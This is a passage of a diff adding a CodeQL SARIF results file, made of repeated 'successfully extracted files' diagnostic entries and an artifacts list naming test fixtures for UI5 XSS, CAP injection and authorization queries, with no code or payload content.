} + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 376 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 377 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 378 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 379 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 380 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 381 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + "uriBaseId" : "%SRCROOT%", + "index" : 382 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 383 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 384 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 385 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 386 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 387 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 388 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 389 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 390 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 391 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 392 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 393 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 394 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 395 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 396 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 397 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 398 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 399 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 400 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 401 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 402 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 403 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 404 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 405 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 406 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 407 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 408 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 409 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 410 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/Sources/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 4 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 412 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 413 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "qlt.conf.json", + "uriBaseId" : "%SRCROOT%", + "index" : 414 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "scripts/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 415 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "scripts/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 416 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + } ], + "executionSuccessful" : true + } ], + "artifacts" : [ { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + } + }, { + "location" : { + "uri" : "javascript/heuristic-models/tests/Sources/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 4 + } + }, { + "location" : { + "uri" : ".github/actions/install-codeql/action.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 5 + } + }, { + "location" : { + "uri" : ".github/actions/install-qlt/action.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 6 + } + }, { + "location" : { + "uri" : ".github/codeql/codeql-config.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 7 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 8 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 9 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 10 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 11 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 12 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/additional-sources.model.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 13 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 14 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 15 + } + }, { + "location" : { + "uri" : ".github/workflows/code_scanning.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 16 + } + }, { + "location" : { + "uri" : ".github/workflows/run-codeql-unit-tests-javascript.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 17 + } + }, { + "location" : { + "uri" : "codeql-workspace.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 18 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/lib/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 19 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/lib/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 20 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/src/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 21 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/src/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 22 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 23 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 24 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 25 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 26 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 27 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 28 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 29 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 30 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 31 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 32 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 33 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 34 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 35 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 36 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 37 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 38 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 39 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 40 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 41 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 42 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 43 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 44 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 45 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 46 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 47 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 48 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 49 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 50 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 51 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 52 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 53 + } + }, { + "location" : { + "uri" : 